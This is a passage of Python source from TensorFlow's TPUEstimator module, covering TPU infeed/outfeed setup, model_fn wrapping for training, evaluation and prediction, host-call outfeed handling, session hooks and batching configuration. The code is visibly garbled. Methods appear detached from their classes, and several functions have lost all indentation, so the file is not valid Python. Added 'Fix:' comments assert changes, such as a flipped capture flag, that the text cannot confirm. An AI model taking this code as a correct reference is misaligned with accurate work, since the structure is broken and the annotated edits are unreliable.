    #   and num_cores_per_replica <= num_cores_per_host
    # First, get the set of host_ids, by iterating replicas.
    # We only want and will get the set of *unique* host_ids
    # *that will call input_fn*. For each replica, we only call the input_fn
    # from the CPU host that contains logical core 0.
    host_device_ids = set()
    for replica_id in xrange(self._ctx.num_replicas):
      host_device, _ = self._ctx.device_for_replica(replica_id)
      # TODO(lehou): Get host_id in a better way.
      host_id = int(host_device.split('/task:')[1].split('/device:')[0])
      host_device_ids.add(host_id)

    for host_id in host_device_ids:
      host_device = tpu_host_placement_fn(host_id=host_id)
      with ops.device(host_device):
        with ops.name_scope('input_pipeline_task%d' % (host_id)):
          if self._ctx.is_input_per_host_with_iterators():
            enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
                generate_per_host_v2_enqueue_ops_fn_for_host(
                    self._ctx, self._input_fn,
                    self._inputs_structure_recorder, host_device, host_id))
          else:
            enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
                generate_per_host_enqueue_ops_fn_for_host(
                    self._ctx, self._input_fn,
                    self._inputs_structure_recorder, self._batch_axis,
                    host_device, host_id))

          # NOTE(xiejw): We dispatch here based on the return type of the
          # users `input_fn`.
          #
          # 1. If input_fn returns a Dataset instance, we initialize the
          # iterator outside of tf.while_loop, and call the iterator.get_next
          # inside tf.while_loop. This should be always safe.
          #
          # 2. If input_fn returns (features, labels), it is too late to wrap
          # them inside tf.while_loop, as resource initialization cannot be
          # handled in TF control flow properly. In this case, we will use
          # python loop to enqueue the data into TPU system. This may be
          # slow compared to the previous case.
          if dataset_initializer:
            all_dataset_initializers.append(dataset_initializer)
            run_infeed_loop_on_coordinator = False
            wrap_fn = (
                _wrap_computation_in_while_loop
                if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
                _wrap_computation_in_while_loop_with_stopping_signals)
            enqueue_ops.append(
                wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
          else:
            enqueue_ops.append(enqueue_ops_fn())
          infeed_queues.append(captured_infeed_queue.get())

  # infeed_queue is used to generate dequeue ops. The only thing it uses for
  # dequeue is dtypes and types. So, any one can be used. Here, grab the
  # first one.
  self._infeed_queue = infeed_queues[0]
  return enqueue_ops, [
      util_lib.MultiHostDatasetInitializerHook(all_dataset_initializers)
  ], run_infeed_loop_on_coordinator
def _validate_input_pipeline(self):
  """Validates the input pipeline.

  Perform some sanity checks to log user friendly information. We should
  error out to give users better error message. But, if
  _WRAP_INPUT_FN_INTO_WHILE_LOOP is False (legacy behavior), we cannot break
  user code, so, log a warning.

  Raises:
    RuntimeError: If the validation failed.
  """
  if ops.get_default_graph().get_collection(ops.GraphKeys.QUEUE_RUNNERS):
    # Fix: the parenthetical "(see ... for instructions." in this
    # user-facing message was never closed; add the closing parenthesis.
    err_msg = ('Input pipeline contains one or more QueueRunners. '
               'It could be slow and not scalable. Please consider '
               'converting your input pipeline to use `tf.data` instead (see '
               'https://www.tensorflow.org/guide/datasets for '
               'instructions.)')
    if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
      raise RuntimeError(err_msg)
    else:
      logging.warn(err_msg)
def call_computation(computation_inputs,
                     computation,
                     batch_config=None):
  """Call computation.

  Args:
    computation_inputs: A tensor or dict of tensors, the inputs to the
      computation.
    computation: A Python function that takes no inputs and builds computation
      graph. If `computation` returns m outputs, this function will return a
      list of m Tensors.
    batch_config: A BatchConfig named tuple specifying the batching
      configuration to use for inference batching.

  Returns:
    A list of output tensors.
  """

  # Using `TPUPartitionedCall` makes it possible to target a different
  # TPU core with every `Session.run()` call. Note that the entire inference
  # graph executes on a single core, and that invocations of this graph
  # will round-robin among the cores attached to a host.
  def tpu_partitioned_call(partition_inputs):

    # capture_resource_var_by_value enables variables to be mirrored on TPU
    # to avoid fetching from CPU, since variables do not change during
    # inference.
    # Fix: this flag was previously passed as False, which contradicts the
    # comment above and disables the mirroring it describes; it must be True
    # for resource variables to be captured by value.
    @function.Defun(capture_resource_var_by_value=True)
    def tpu_subgraph():
      return computation(partition_inputs)

    return tpu_functional.TPUPartitionedCall(
        args=tpu_subgraph.captured_inputs,
        device_ordinal=tpu_ops.tpu_ordinal_selector(),
        Tout=[o.type for o in tpu_subgraph.definition.signature.output_arg],
        f=tpu_subgraph)

  # Not using Batching Function but use TPUPartitionedCall/all cores.
  if not batch_config:
    return tpu_partitioned_call(computation_inputs)

  # Use Batching Function and TPUPartitionedCall/all cores.
  # Note that BatchingFunction requires a list of tensors and doesn't support
  # a dict of tensors. So we preserve the structure by deterministically
  # flattening the dict before batching and then recomposing it after batching
  # to feed into the computation.
  ordered_inputs_list = nest.flatten(computation_inputs)

  @batch_ops.batch_function(
      num_batch_threads=batch_config.num_batch_threads,
      max_batch_size=batch_config.max_batch_size,
      batch_timeout_micros=batch_config.batch_timeout_micros,
      allowed_batch_sizes=batch_config.allowed_batch_sizes,
      max_enqueued_batches=batch_config.max_enqueued_batches,
      autograph=False)
  def batched_tpu_computation(*tensor_args):
    """Recompose the input feature dict and calls the TPU computation."""
    computation_feature_input = nest.pack_sequence_as(computation_inputs,
                                                      tensor_args)
    return tpu_partitioned_call(computation_feature_input)

  return batched_tpu_computation(*ordered_inputs_list)
class _ModelFnWrapper(object):
  """A `model_fn` wrapper.

  This makes calling model_fn on CPU and TPU easier and more consistent and
  performs necessary check and mutation required by TPU training and evaluation.

  In addition, this wrapper manages converting the `model_fn` to a single TPU
  train and eval step.
  """

  def __init__(self, model_fn, config, params, ctx):
    # User-provided model_fn plus the (config, params) pair that will be
    # deep-copied and forwarded to it; `ctx` is the internal TPU context
    # used to decide CPU vs TPU execution paths.
    self._model_fn = model_fn
    self._config = config
    self._params = params
    self._ctx = ctx

  def call_without_tpu(self, features, labels, is_export_mode):
    # Direct CPU invocation of model_fn, bypassing infeed/outfeed handling.
    return self._call_model_fn(features, labels, is_export_mode=is_export_mode)
def _add_embedding_features(self, features, hook_dummy_table_variables):
"""Add embedding features, optionally add hook to intercept gradient."""
if self._ctx.embedding_config:
tpu_embedding_ = self._ctx.embedding_config.tpu_embedding
embedding_activations = tpu_embedding_.get_activations()
if hook_dummy_table_variables:
new_embedding_activations = (
tpu_embedding_gradient.hook_dummy_table_variables_to_activations(
tpu_embedding_, embedding_activations,
self._ctx.embedding_config.dummy_table_variables))
features.update(new_embedding_activations)
else:
features.update(embedding_activations)
def convert_to_single_tpu_train_step(self, dequeue_fn):
  """Converts the user provided `model_fn` as a single train step on TPU.

  The user provided `model_fn` takes input tuple
  (features, labels) and produces the EstimatorSpec with train_op and loss for
  train `mode`. This usually represents a single train computation on CPU.

  For TPU training, a train (computation) step is first wrapped in a
  tf.while_loop control flow to repeat for many times and then replicated to
  all TPU shards. Besides the input should be taken from TPU infeed rather
  than input pipeline (input_fn) directly. To fit TPU loop and replicate
  pattern, the original train computation should be reformed, which is the
  returned `train_step`.

  Args:
    dequeue_fn: The function to retrieve inputs, features and labels, from TPU
      infeed dequeue channel.

  Returns:
    A tuple of train_fn, host_calls, and captured scaffold_fn. The train_fn
    representing the train step for TPU.
  """
  host_call = _OutfeedHostCall(
      self._ctx, outfeed_every_n_steps=self._config.tpu_config
      .experimental_host_call_every_n_steps)
  captured_scaffold_fn = _CapturedObject()
  captured_training_hooks = _CapturedObject()

  def train_step(step):
    """Training step function for use inside a while loop."""
    inputs = dequeue_fn()
    features, labels = inputs.features_and_labels()
    # True: hook dummy table variables so embedding gradients can be
    # intercepted during training.
    self._add_embedding_features(features, True)

    estimator_spec = self._verify_estimator_spec(
        self._call_model_fn(features, labels))
    loss, train_op = estimator_spec.loss, estimator_spec.train_op

    # Only a _TPUEstimatorSpec carries a scaffold_fn; capture None otherwise
    # so the captured object is always populated.
    if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec):  # pylint: disable=protected-access
      captured_scaffold_fn.capture(estimator_spec.scaffold_fn)
    else:
      captured_scaffold_fn.capture(None)

    captured_training_hooks.capture(estimator_spec.training_hooks)

    if self._ctx.embedding_config is None:
      apply_sparse_grads = []
    else:
      # Build the sparse (embedding-table) gradient update ops, optionally
      # scaling gradients by the configured multiplier.
      tpu_embedding_ = self._ctx.embedding_config.tpu_embedding
      gradients = (
          tpu_embedding_gradient.get_gradients_through_dummy_table_variables(
              tpu_embedding_)
      )
      grad_multiplier = self._ctx.embedding_config.get_grad_multiplier()
      if grad_multiplier is not None:
        scaled_gradients = collections.OrderedDict(
            (k, v * grad_multiplier) for k, v in six.iteritems(gradients))
      else:
        scaled_gradients = gradients
      apply_sparse_grads = [
          tpu_embedding_.generate_send_gradients_op(scaled_gradients)
      ]

    # We must run train_op to update the variables prior to running the
    # outfeed.
    with ops.control_dependencies([train_op] + apply_sparse_grads):
      host_call_outfeed_ops = []
      host_call_fn, host_call_args = None, []

      if (isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec)  # pylint: disable=protected-access
          and estimator_spec.host_call is not None):
        host_call_fn, host_call_args = estimator_spec.host_call

      if host_call_fn:
        # Ignore dummy hostcalls (no arguments)
        if host_call_args:
          host_call.record({'host_call': estimator_spec.host_call})
          host_call_outfeed_ops = host_call.create_enqueue_op(step)
      else:
        # Create a host call for the loss to track execution progress
        # Without this, we don't have any indication of the state of the
        # TPU program.
        host_call.record({
            'host_call': (lambda loss_t: loss_t,
                          [array_ops.reshape(loss, [1])])
        })
        host_call_outfeed_ops = host_call.create_enqueue_op(step)
      # The step's returned loss depends on the outfeed so the enqueue is
      # guaranteed to run.
      with ops.control_dependencies(host_call_outfeed_ops):
        return array_ops.identity(loss)

  return (train_step, host_call, captured_scaffold_fn,
          captured_training_hooks)
def convert_to_single_tpu_eval_step(self, dequeue_fn):
  """Converts the user provided `model_fn` as a single eval step on TPU.

  Similar to training, the user provided `model_fn` takes input tuple
  (features, labels) and produces the TPUEstimatorSpec with eval_metrics for
  eval `mode`. This usually represents a single evaluation computation on CPU.

  For TPU evaluation, a eval (computation) step is first wrapped in a
  tf.while_loop control flow to repeat for many times and then replicated to
  all TPU shards. Besides the input and output are slightly different. Input,
  features and labels, should be taken from TPU infeed rather than input
  pipeline (input_fn) directly. Output is managed in two stages. First, the
  model outputs as the result of evaluation computation, usually model logits,
  should be transferred from TPU system to CPU. Then, all model outputs are
  concatenated first on CPU and sent to the metric_fn for metrics computation.
  To fit TPU evaluation pattern, the original eval computation should be
  reformed, which is the returned `eval_step`.

  Args:
    dequeue_fn: The function to retrieve inputs, features and labels, from TPU
      infeed dequeue channel.

  Returns:
    A tuple of eval_fn, host_calls, and captured scaffold_fn. The eval_fn
    representing the eval step for TPU.
  """
  host_calls = _OutfeedHostCall(self._ctx)
  captured_scaffold_fn = _CapturedObject()
  captured_eval_hooks = _CapturedObject()

  def eval_step(total_loss):
    """Evaluation step function for use inside a while loop."""
    inputs = dequeue_fn()
    features, labels = inputs.features_and_labels()
    # False: no gradient interception needed during evaluation.
    self._add_embedding_features(features, False)

    tpu_estimator_spec = self._call_model_fn(features, labels)
    if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec):  # pylint: disable=protected-access
      raise RuntimeError(
          'estimator_spec used by TPU evaluation must have type'
          '`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))

    loss = tpu_estimator_spec.loss
    captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
    captured_eval_hooks.capture(tpu_estimator_spec.evaluation_hooks)

    to_record = {}
    if tpu_estimator_spec.eval_metrics:
      to_record['eval_metrics'] = tpu_estimator_spec.eval_metrics
    if tpu_estimator_spec.host_call is not None:
      # We assume that evaluate won't update global step, so we don't wrap
      # this host_call.
      to_record['host_call'] = tpu_estimator_spec.host_call
    host_calls.record(to_record)

    # Accumulate the loss across iterations; the enqueue must run before the
    # add so model outputs reach the CPU.
    with ops.control_dependencies(host_calls.create_enqueue_op()):
      return math_ops.add(total_loss, loss)

  return eval_step, host_calls, captured_scaffold_fn, captured_eval_hooks
def convert_to_single_tpu_predict_step(self, dequeue_fn):
  """Converts the user provided `model_fn` as a single predict step on TPU.

  Args:
    dequeue_fn: The function to retrieve inputs, features and labels, from TPU
      infeed dequeue channel.

  Returns:
    A tuple of predict_fn, host_calls, and captured scaffold_fn. The
    predict_fn representing the predict step for TPU.
  """
  host_calls = _OutfeedHostCall(self._ctx)
  captured_scaffold_fn = _CapturedObject()
  captured_predict_hooks = _CapturedObject()

  def predict_step(unused_scalar_stopping_signal):
    """Prediction step function for use inside a while loop."""
    inputs = dequeue_fn()
    features, labels = inputs.features_and_labels()
    stopping_signals = inputs.signals()

    # Stopping signals mark the end of input in predict mode; they are
    # produced by the infeed side and must always be present here.
    assert stopping_signals is not None, (
        'Internal Error: `signals` is missing.')

    tpu_estimator_spec = self._call_model_fn(
        features, labels, is_export_mode=False)
    if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec):  # pylint: disable=protected-access
      raise RuntimeError(
          'estimator_spec used by TPU prediction must have type'
          '`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))

    self._verify_tpu_spec_predictions(tpu_estimator_spec.predictions)

    captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
    captured_predict_hooks.capture(tpu_estimator_spec.prediction_hooks)
    to_record = {}
    # identity_fn passes the prediction/signal dicts through the outfeed
    # unchanged.
    identity_fn = lambda **kwargs: kwargs
    to_record['predictions'] = [identity_fn, tpu_estimator_spec.predictions]
    to_record['signals'] = [identity_fn, stopping_signals]
    if tpu_estimator_spec.host_call is not None:
      to_record['host_call'] = tpu_estimator_spec.host_call
    host_calls.record(to_record)

    # The loop condition consumes the scalar stopping signal; the enqueue
    # must run before it is produced.
    with ops.control_dependencies(host_calls.create_enqueue_op()):
      return _StopSignals.as_scalar_stopping_signal(stopping_signals)

  return (predict_step, host_calls, captured_scaffold_fn,
          captured_predict_hooks)
def _verify_tpu_spec_predictions(self, predictions):
"""Validates TPUEstimatorSpec.predictions dict."""
# TODO(xiejw): Adds validation for prediction dictionrary.
# TODO(xiejw): Adds support for single tensor as predictions.
if not isinstance(predictions, dict):
raise TypeError('TPUEstimatorSpec.predictions must be dict of Tensors.')
for (key, tensor) in predictions.items():
if tensor.shape.dims[0].value is None:
raise ValueError(
'The tensor with key ({}) in TPUEstimatorSpec.predictions has '
'dynamic shape (should be static). Tensor: {}'.format(key, tensor))
return predictions
def _validate_model_features_and_labels(self, features, labels,
                                        is_export_mode):
  """Validates that the features and labels for the model function are valid.

  A valid features/labels object is the one with:
  - Type: A tensor or any nested structure of tensors supported by TF nest,
      namely nested dictionary, tuple, namedtuple, or sequence of tensors.
  - Static shape if is_export_mode is False.

  Args:
    features: the features that would be input to the model function.
    labels: the labels that would be input to the model function.
    is_export_mode: boolean value specifying if in export mode.

  Raises:
    TypeError: If features/labels are not of the correct type.
    ValueError: If features/labels have dynamic shape.
  """

  def validate(obj, obj_name):
    """Helper validate function."""
    # Static shapes are only required when actually running on TPU.
    if is_export_mode or self._ctx.is_running_on_cpu(is_export_mode):
      return
    # A bare Tensor is checked directly; any nested structure is flattened
    # first.  Both branches raise the same message.
    flat_tensors = (
        [obj] if isinstance(obj, ops.Tensor) else data_nest.flatten(obj))
    for tensor in flat_tensors:
      if not tensor.get_shape().is_fully_defined():
        raise ValueError(
            'The {} to the model returned by input_fn must have static '
            'shape. Tensor: {}'.format(obj_name, tensor))

  validate(features, 'features')
  if labels is not None:
    validate(labels, 'labels')
def _call_model_fn(self, features, labels, is_export_mode=False):
  """Calls the model_fn with required parameters.

  Args:
    features: features to pass to model_fn.
    labels: labels to pass to model_fn; may be None.
    is_export_mode: whether the model is being built for export.

  Returns:
    The spec returned by model_fn; a `_TPUEstimatorSpec` is converted to a
    plain `EstimatorSpec` when running on CPU.

  Raises:
    ValueError: If model_fn's signature is incompatible with the inputs.
  """
  self._validate_model_features_and_labels(features, labels, is_export_mode)
  model_fn_args = function_utils.fn_args(self._model_fn)
  kwargs = {}

  # Make deep copies of `config` and `params` in case the user mutates them.
  config = copy.deepcopy(self._config)
  params = copy.deepcopy(self._params)

  if 'labels' in model_fn_args:
    kwargs['labels'] = labels
  elif labels is not None:
    raise ValueError(
        'model_fn does not take labels, but input_fn returns labels.')
  if 'mode' in model_fn_args:
    kwargs['mode'] = self._ctx.mode
  if 'config' in model_fn_args:
    kwargs['config'] = config
  if 'params' in model_fn_args:
    kwargs['params'] = params

  # TPUEstimator requires `params` so it can inject the batch size.
  if 'params' not in model_fn_args:
    raise ValueError('model_fn ({}) does not include params argument, '
                     'required by TPUEstimator to pass batch size as '
                     'params[\'batch_size\']'.format(self._model_fn))

  if is_export_mode:
    batch_size_for_model_fn = None
  else:
    batch_size_for_model_fn = self._ctx.batch_size_for_model_fn

  if batch_size_for_model_fn is not None:
    _add_item_to_params(params, _BATCH_SIZE_KEY, batch_size_for_model_fn)

  running_on_cpu = self._ctx.is_running_on_cpu(is_export_mode)
  # In export mode, params['use_tpu'] has already been set based on mode
  # (i.e. True for _REWRITE_FOR_INFERENCE_MODE, False otherwise).
  if not is_export_mode:
    _add_item_to_params(params, _USE_TPU_KEY, not running_on_cpu)

  if not running_on_cpu:
    # Expose the user-facing TPUContext through params when on TPU.
    user_context = tpu_context.TPUContext(
        internal_ctx=self._ctx, call_from_input_fn=False)
    _add_item_to_params(params, _CTX_KEY, user_context)

  estimator_spec = self._model_fn(features=features, **kwargs)
  if (running_on_cpu and
      isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec)):  # pylint: disable=protected-access
    # The estimator_spec will be passed to `Estimator` directly, which expects
    # type `EstimatorSpec`.
    return estimator_spec.as_estimator_spec()
  else:
    return estimator_spec
def _verify_estimator_spec(self, estimator_spec):
  """Validates the estimator_spec.

  A `_TPUEstimatorSpec` passes through unchanged; a plain `EstimatorSpec`
  is checked for features TPUEstimator does not support.

  Raises:
    ValueError: If `training_chief_hooks` are set on a plain EstimatorSpec.
  """
  if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec):  # pylint: disable=protected-access
    return estimator_spec

  err_msg = '{} returned by EstimatorSpec is not supported in TPUEstimator.'
  if estimator_spec.training_chief_hooks:
    # Fix: the concatenated message previously read
    # "...TPUEstimator.If you want..." with no space after the period.
    raise ValueError(
        err_msg.format('training_chief_hooks') + ' If you want' +
        ' to pass training hooks, please pass via training_hooks.')

  if estimator_spec.scaffold:
    logging.warning('EstimatorSpec.Scaffold is ignored by TPU train/eval. '
                    'Please use TPUEstimatorSpec.')
  return estimator_spec
class _OutfeedHostCall(object):
  """Support for `eval_metrics` and `host_call` in TPUEstimatorSpec."""

  def __init__(self, ctx, outfeed_every_n_steps=1):
    self._ctx = ctx
    # Host-call names, in recording order.
    self._names = []
    # All of these are dictionaries of lists keyed on the name.
    self._host_fns = {}        # name -> host function
    self._tensor_keys = collections.defaultdict(list)    # dict keys (or None)
    self._tensors = collections.defaultdict(list)        # tensors to outfeed
    self._tensor_dtypes = collections.defaultdict(list)  # matching dtypes
    self._tensor_shapes = collections.defaultdict(list)  # matching shapes
    # Enqueue every step when 1; otherwise only on steps divisible by n.
    self._outfeed_every_n_steps = outfeed_every_n_steps
@staticmethod
def validate(host_calls):
"""Validates the `eval_metrics` and `host_call` in `TPUEstimatorSpec`."""
for name, host_call in host_calls.items():
if not isinstance(host_call, (tuple, list)):
raise ValueError('{} should be tuple or list'.format(name))
if len(host_call) != 2:
raise ValueError('{} should have two elements.'.format(name))
if not callable(host_call[0]):
raise TypeError('{}[0] should be callable.'.format(name))
if not isinstance(host_call[1], (tuple, list, dict)):
raise ValueError('{}[1] should be tuple or list, or dict.'.format(name))
if isinstance(host_call[1], (tuple, list)):
fullargspec = tf_inspect.getfullargspec(host_call[0])
fn_args = function_utils.fn_args(host_call[0])
# wrapped_hostcall_with_global_step uses varargs, so we allow that.
if fullargspec.varargs is None and len(host_call[1]) != len(fn_args):
raise RuntimeError(
'In TPUEstimatorSpec.{}, length of tensors {} does not match '
'method args of the function, which takes {}.'.format(
name, len(host_call[1]), len(fn_args)))
@staticmethod
def create_cpu_hostcall(host_calls):
"""Runs on the host_call on CPU instead of TPU when use_tpu=False."""
_OutfeedHostCall.validate(host_calls)
ret = {}
for name, host_call in host_calls.items():
host_fn, tensors = host_call
if isinstance(tensors, (tuple, list)):
ret[name] = host_fn(*tensors)
else:
# Must be dict.
try:
ret[name] = host_fn(**tensors)
except TypeError as e:
logging.warning(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise
return ret
def record(self, host_calls):
"""Records the host_call structure."""
for name, host_call in host_calls.items():
host_fn, tensor_list_or_dict = host_call
self._names.append(name)
self._host_fns[name] = host_fn
if isinstance(tensor_list_or_dict, dict):
for (key, tensor) in six.iteritems(tensor_list_or_dict):
self._tensor_keys[name].append(key)
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
else:
# List or tuple.
self._tensor_keys[name] = None
for tensor in tensor_list_or_dict:
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
def create_enqueue_op(self, step=None):
"""Create the op to enqueue the recorded host_calls.
Returns:
A list of enqueue ops, which is empty if there are no host calls.
"""
if not self._names:
return []
tensors = []
# TODO(jhseu): Consider deduping tensors.
for name in self._names:
tensors.extend(self._tensors[name])
if self._outfeed_every_n_steps > 1 and step is None:
raise ValueError('If outfeed is requested every n steps, you must pass '
'a tensor whose value is the step number within the '
'current training loop.')
with ops.device(tpu.core(0)):
if self._outfeed_every_n_steps == 1:
return [tpu_ops.outfeed_enqueue_tuple(tensors)]
else:
return [control_flow_ops.cond(
math_ops.equal(math_ops.mod(step, self._outfeed_every_n_steps), 0),
lambda: tpu_ops.outfeed_enqueue_tuple(tensors),
lambda: control_flow_ops.no_op())]
def create_tpu_hostcall(self):
  """Sends the tensors through outfeed and runs the host_fn on CPU.

  The tensors are concatenated along dimension 0 to form a global tensor
  across all shards. The concatenated function is passed to the host_fn and
  executed on the first host.

  Returns:
    A dictionary mapping name to the return type of the host_call by that
    name.

  Raises:
    RuntimeError: If outfeed tensor is scalar.
  """
  if not self._names:
    return {}

  ret = {}
  # For each i, dequeue_ops[i] is a list containing the tensors from all
  # shards. This list is concatenated later.
  dequeue_ops = []
  tensor_dtypes = []
  tensor_shapes = []
  for name in self._names:
    for _ in self._tensors[name]:
      dequeue_ops.append([])
    for dtype in self._tensor_dtypes[name]:
      tensor_dtypes.append(dtype)
    for shape in self._tensor_shapes[name]:
      tensor_shapes.append(shape)

  # Outfeed ops execute on each replica's first logical core. Note: we must
  # constraint it such that we have at most one outfeed dequeue and enqueue
  # per replica.
  for i in xrange(self._ctx.num_replicas):
    host_device, ordinal_id = self._ctx.device_for_replica(i)
    with ops.device(host_device):
      outfeed_tensors = tpu_ops.outfeed_dequeue_tuple(
          dtypes=tensor_dtypes,
          shapes=tensor_shapes,
          device_ordinal=ordinal_id)
      for j, item in enumerate(outfeed_tensors):
        dequeue_ops[j].append(item)

  # Deconstruct dequeue ops.
  flat_dequeue_ops = []
  for l in dequeue_ops:
    flat_dequeue_ops.extend(l)

  # Slice the flat per-tensor lists back into per-host-call groups, in the
  # same order they were recorded.
  dequeue_ops_by_name = {}
  pos = 0
  for name in self._names:
    dequeue_ops_by_name[name] = dequeue_ops[pos:pos +
                                            len(self._tensors[name])]
    pos += len(self._tensors[name])

  def _call_host_fn(fn, *args, **kw):
    # Run the user host_fn inside a context that catches invalid hostcall
    # constructs and validates the result.
    context = CatchInvalidHostcallFunctions()
    context.Enter()
    result = fn(*args, **kw)
    context.Exit()
    context.ExitResult(result)
    return result

  # It is assumed evaluation always happens on single host TPU system. So,
  # place all ops on tpu host if possible.
  #
  # TODO(jhseu): Evaluate whether this is right for summaries.
  with ops.device(self._ctx.tpu_host_placement_function(replica_id=0)):
    for name in self._names:
      # NOTE: `dequeue_ops` is deliberately rebound here to the per-name
      # group; `flat_dequeue_ops` above still references the full set.
      dequeue_ops = dequeue_ops_by_name[name]
      for i, item in enumerate(dequeue_ops):
        if dequeue_ops[i][0].shape.ndims == 0:
          raise RuntimeError(
              'All tensors outfed from TPU should preserve batch size '
              'dimension, but got scalar {}'.format(dequeue_ops[i][0]))
        # TODO(xiejw): Make the specification of the outfeed combination
        # function more explicit and well-documented. We may want to give the
        # user the option of concatenating along any axis.
        if (self._ctx.config.tpu_config.per_host_input_for_training is
            tpu_config.InputPipelineConfig.BROADCAST):
          # If the infeed is in BROADCAST mode (each core receiving the same
          # input), then we assume that the cores also produce identical
          # copies of the same output, and we simply take the output from
          # the first core. This mode is used by Mesh-TensorFlow.
          with ops.control_dependencies(dequeue_ops[i]):
            dequeue_ops[i] = array_ops.identity(dequeue_ops[i][0])
        else:
          # Assume that the input has been batch-split and that axis 0 of the
          # output tensors represents the batch size. Concatenate along
          # the axis 0 to re-combine the batch.
          dequeue_ops[i] = array_ops.concat(dequeue_ops[i], axis=0)

      if self._tensor_keys[name] is not None:
        # The user-provided eval_metrics[1] is a dict.
        dequeue_ops = dict(zip(self._tensor_keys[name], dequeue_ops))
        try:
          ret[name] = _call_host_fn(self._host_fns[name], **dequeue_ops)
        except TypeError as e:
          logging.warning(
              'Exception while calling %s: %s. It is likely the tensors '
              '(%s[1]) do not match the '
              'function\'s arguments', name, e, name)
          raise
      else:
        ret[name] = _call_host_fn(self._host_fns[name], *dequeue_ops)

  # force all dequeue operations to be run if not consumed by the host calls
  ret['__force_dequeue'] = control_flow_ops.group(*flat_dequeue_ops)
  return ret
class _OutfeedHostCallHook(session_run_hook.SessionRunHook):
  """Hook to run host calls when use_tpu=False."""

  def __init__(self, tensors):
    self._tensors = tensors

  def begin(self):
    # Summary-writer initialization is duplicated from
    # TPUInfeedOutfeedSessionHook rather than placed in its own hook so that
    # execution order is guaranteed: summaries must be initialized before the
    # outfeed thread starts.
    # TODO(jhseu): Make a wrapper hook instead?
    self._init_ops = contrib_summary.summary_writer_initializer_op()
    # Each initializer op's first input is its writer resource; build one
    # flush op per writer so every pending summary is written out at `end`.
    self._finalize_ops = [
        contrib_summary.flush(writer=init_op.inputs[0])
        for init_op in self._init_ops
    ]

  def after_create_session(self, session, coord):
    session.run(self._init_ops)

  def before_run(self, run_context):
    return basic_session_run_hooks.SessionRunArgs(self._tensors)

  def end(self, session):
    session.run(self._finalize_ops)
class ExamplesPerSecondHook(basic_session_run_hooks.StepCounterHook):
  """Calculate and report global_step/sec and examples/sec during runtime."""

  def __init__(self,
               batch_size,
               every_n_steps=100,
               every_n_secs=None,
               output_dir=None,
               summary_writer=None):
    # The global batch size converts the step rate into an example rate.
    self._batch_size = batch_size
    super(ExamplesPerSecondHook, self).__init__(
        every_n_steps=every_n_steps,
        every_n_secs=every_n_secs,
        output_dir=output_dir,
        summary_writer=summary_writer)

  def _log_and_record(self, elapsed_steps, elapsed_time, global_step):
    steps_per_sec = elapsed_steps / elapsed_time
    examples_per_sec = self._batch_size * steps_per_sec
    if self._summary_writer is not None:
      # Emit one scalar summary per metric, both stamped with `global_step`.
      for tag, metric in (('global_step/sec', steps_per_sec),
                          ('examples/sec', examples_per_sec)):
        self._summary_writer.add_summary(
            Summary(value=[Summary.Value(tag=tag, simple_value=metric)]),
            global_step)
    logging.info('global_step/sec: %g', steps_per_sec)
    logging.info('examples/sec: %g', examples_per_sec)
class InstallSignalHandlerHook(session_run_hook.SessionRunHook):
  """Change SIGINT (CTRL^C) handler to force quit the process.

  The default behavior often results in hanging processes.
  The original handler is restored after training/evaluation.
  """

  def __init__(self):
    # Remember whatever SIGINT handler is installed right now so that `end`
    # can restore it once the session finishes.
    self._saved_sigint_handler = signal.getsignal(signal.SIGINT)

  def before_run(self, run_context):
    # SIG_DFL terminates the process immediately instead of raising
    # KeyboardInterrupt, which can otherwise leave background threads hung.
    signal.signal(signal.SIGINT, signal.SIG_DFL)

  def end(self, session):
    signal.signal(signal.SIGINT, self._saved_sigint_handler)
class ExportSavedModelApiVersion(enum.Enum):
  """Selects which `export_saved_model()` contract `TPUEstimator` uses.

  V1: the exporter wraps `tpu.rewrite()`/`TPUPartitionedCallOp` around the
    user's `model_fn` automatically.
  V2: the user is expected to perform the TPU rewrite inside `model_fn`
    (e.g. via `inference_on_tpu()`), keyed off `params['use_tpu']`.
  """
  V1 = 1
  V2 = 2
class BatchConfig(
    collections.namedtuple('BatchConfig', [
        'num_batch_threads', 'max_batch_size', 'batch_timeout_micros',
        'allowed_batch_sizes', 'max_enqueued_batches'
    ])):
  """Class to handle config inputs into the batching function."""

  def __new__(cls,
              num_batch_threads,
              max_batch_size,
              batch_timeout_micros,
              allowed_batch_sizes,
              max_enqueued_batches=10):
    """Creates a BatchConfig instance.

    Args:
      num_batch_threads: Number of scheduling threads for processing batches
        of work. Determines the number of batches processed in parallel.
      max_batch_size: Batch sizes will never be bigger than this.
      batch_timeout_micros: Maximum number of microseconds to wait before
        outputting an incomplete batch.
      allowed_batch_sizes: Optional list of allowed batch sizes. If left
        empty, does nothing. Otherwise, supplies a list of batch sizes,
        causing the op to pad batches up to one of those sizes. The entries
        must increase monotonically, and the final entry must equal
        max_batch_size.
      max_enqueued_batches: The maximum depth of the batch queue. Defaults to
        10.

    Returns:
      A BatchConfig instance.
    """
    # Delegate to the namedtuple constructor; the only purpose of this
    # override is to supply the max_enqueued_batches default.
    return super(BatchConfig, cls).__new__(cls, num_batch_threads,
                                           max_batch_size,
                                           batch_timeout_micros,
                                           allowed_batch_sizes,
                                           max_enqueued_batches)
@estimator_export(v1=['estimator.tpu.TPUEstimator'])
class TPUEstimator(estimator_lib.Estimator):
"""Estimator with TPU support.
TPUEstimator also supports training on CPU and GPU. You don't need to define
a separate `tf.estimator.Estimator`.
